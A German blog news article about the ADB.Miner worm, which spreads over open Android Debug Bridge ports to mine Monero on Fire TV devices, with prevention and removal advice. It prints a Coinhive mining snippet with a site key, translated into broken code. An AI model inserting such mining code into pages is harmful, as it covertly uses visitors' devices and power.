Krypto-Wurm schürft Monero auf Amazons Fire-TV-Geräten

Krypto-Wurm schürft Monero auf Amazons Fire-TV-Geräten

Eine derzeit kursierde Krypto-Malware ist in der Lage, den Amazon Fire TV und den Fire TV Stick, lahmzulegen, aber auch andere Android-Geräte im Netzwerk gleich mit zu infizieren. Auf das Problem machten aktuell Forum-Mitglieder von XDA-Developers aufmerksam. Unser Team von prinzipia.com zeigt Betroffen auf, wie man diese Infektion wieder los wird, aber auch, wie man diese Art von Infektionen gänzlich vermeidet.

Wie äußert sich eine Infektion?

Gemäß Berichten von Forenmitgliedern bei XDA-Developers sorgt der Wurm dafür, dass der Fire TV Stick nicht mehr nutzbar war. So würde die Test-App ständig eine Meldung anzeigen, dadurch stoppten Videos oder stürzten ab. Zusätzlich macht sie durch aufpoppende weiße Fenster auf sich aufmerksam. ADB.Miner sorgt auf dem Fire TV für ein Öffnen des Browsers und ruft eine präparierte Webseite auf. Cyberkriminelle schürfen auf diese Weise das Krypto-Geld Monero auf Kosten Infizierter. Je nachdem, wie viele Geräte befallen sind, können sich die Urheber so ein Vermögen verdienen.

Malware-App „ADB.Miner“

Die Malware ADB.Miner wurde erstmals am 31. Januar 2018 aufgespürt. Innerhalb 24 Stunden konnte sich die Schadsoftware bereits auf 5.000 Geräten installieren und verbreitet sich seitdem weltweit. Dem Schädling auf die Schliche gekommen ist das Team von Doublepulsar. Die Malware-App „ADB.Miner“ tarnt sich unter der Bezeichnung “Test” und wird als Prozess „com.google.time.timer“ ausgeführt. Unter Android gibt es eine Funktion namens Android Debug Bridge (kurz ADB), mit der Entwickler aus der Ferne mit einem Gerät kommunizieren, Befehle ausführen und das Gerät vollständig steuern können.

Verbreitungswege

Somit ist ADB aber auch ein offenes Einfallstor für Schälinge aller Art. Es ist nicht vollständig authentifiziert, d.h., jeder Benutzer kann sich mit einem Gerät verbinden, auf dem ADB ausgeführt wird, um Befehle auszuführen. Um dies zu ermöglichen, muss man eine physische Verbindung zu einem Gerät über USB herstellen und zuerst die Debug Bridge aktivieren. Es überwacht Port 5555 und ermöglicht jedem, sich über das Internet mit einem Gerät zu verbinden. Anbieter haben Produkte mit Android Debug Bridge bereitgestellt. User nutzen die Android Debug Bridge dazu, um Apps über den „Sideloader“ auf dem Gerät zu installieren, wie Programme, die so nicht im Appstore angeboten werden. Wer allerdings auf diese Art Apps installiert, handelt sich nicht selten Schadprogramme gleich mit ein, denn nicht selten lauert hinter Anwendungen, die das kostenlose Schauen von Sky oder von aktuellen Kinofilmen versprechen, Malware.

Im Fall von ADB.Miner gibt es jedoch noch einen zweiten Verbreitungsweg: Durch das aktivierte „ADB-Debugging“ ist das Fire-TV-Gerät aus der Ferne ansprechbar, denn auch die Malware-App „ADB.Miner“ nutzt TCP-Port 5555. Auf diese Weise suchen infizierte Geräte über den TCP-Port 5555 nach weiteren Geräten, die durch den offenen ADB ebenfalls bereit für eine „Übernahme“ sind. Da die Malware dort aber offenbar keine Fenster öffnet, bleibt sie so tendenziell länger unbemerkt. Ist also ein Android-Gerät im selben Netzwerk mit dem Wurm infiziert, wandert der über den offenen Kanal auch auf den Fire TV. Der Wurm enthält ein Snippet von Coinhive, der den Miner für die Kryptowährung Monero als JavaScript-Bibliothek anbietet und tauchte unter dem Namen coinhive.min.js im Code auf. Eine Ausführung des Programms lässt sich verhindern, wenn Javascript im Browser deaktiviert wird.

<script src = “https://coinhive.com/lib/coinhive.min.js”> </ script>
<Skript>
var miner = neu CoinHive.Anonymous (‘eXnvyAQwXxGV80C4fGuiRiDZiDpDaSrf’, {
Themen: 3,
Drossel: 0.6
});
miner.start ();
</ script>

Infektionsvermeidung

Eine solche Infektion lässt sich vermeiden, indem man die „Android Debug Bridge“ (ADB) nicht aktiviert und zudem die manuelle Installation fraglicher Apps sein lässt. Auch auf das Anschauen von Filmkopien aus dem Internet sollte man verzichten. Falls die Performance des Android TV oder Fire TV Gerätes aber bereits auffällig langsam ist, lohnt sich ein Blick in die ADB. Ist man nicht betroffen, sollte man aber in den Einstellungen rein prophylaktisch nachsehen, ob die ADB aktiviert ist und diese ggf. schließen. Die Option „ADB Debugging“ findet man in den Entwicklereinstellungen des Fire-Geräts und im gleichen Menü sollte man zudem auch die Installation von Apps aus unbekannten Quellen gleich mit unterbinden.

Eliminieren des ADB.Miner bei bereits erfolgter Infektion

Sollte man bereits infiziert sein, reicht die reine Deinstallation der “Test-App” nicht aus, denn die Anwendung verbreitet sich ja wurmartig und somit lädt die Malware die Anwendung erneut herunter. XDA-Nutzer innovaciones nennt in seinem Beitrag drei Lösungswege: Entweder entfernt man den Schädling über einige ADB-Befehle oder setzt den Fire TV auf Werkseinstellungen zurück oder gaukeln dem Wurm vor, dass der seine Arbeit macht. Das klappt über eine manipulierte Version, die man problemlos installieren kann. Die ruft nur eine leere Webseite auf und es erscheint kein Fenster, das den Stream unterbricht. Wenn man allerdings den Fire TV auf Werkseinstellungen zurücksetzt sollte man sich darüber bewusst sein, dass in diesem Fall alle Daten, Apps, Passwörter etc. verloren gehen.

Bildquelle: andresantanams, thx! (CC0 Public Domain)

Related Post

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht.